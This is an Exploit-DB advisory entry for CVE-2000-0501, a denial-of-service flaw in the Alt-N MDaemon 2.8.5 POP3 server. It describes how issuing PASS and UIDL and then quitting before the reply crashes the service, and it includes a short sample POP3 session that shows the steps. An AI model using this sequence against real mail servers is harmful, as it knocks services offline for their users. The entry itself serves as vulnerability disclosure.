Alt-N MDaemon 2.8.5 - UIDL DoS Vulnerability

ID EDB-ID:20020
Type exploitdb
Reporter Craig
Modified 2000-06-16T00:00:00


Alt-N MDaemon 2.8.5 0 UIDL DoS Vulnerability. CVE-2000-0501. Dos exploit for windows platform


A remote user is capable of crashing Alt-N MDaemon by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality. 

Perform the following very quickly:

+OK <target> POP service ready using MDaemon
v2.8.5.0 T

User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
-ERR unknown POP command!
+OK <username> <target> POP Server signing off (mailbox empty)